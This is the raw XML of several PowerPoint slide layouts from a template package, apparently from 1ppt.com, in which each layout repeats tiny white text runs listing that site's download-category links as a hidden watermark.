              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout188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88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88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88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8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89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89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89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89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89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89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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout189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89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89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89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9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90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90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90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90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90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90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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout190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90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90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90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9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91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91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91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91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91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91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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
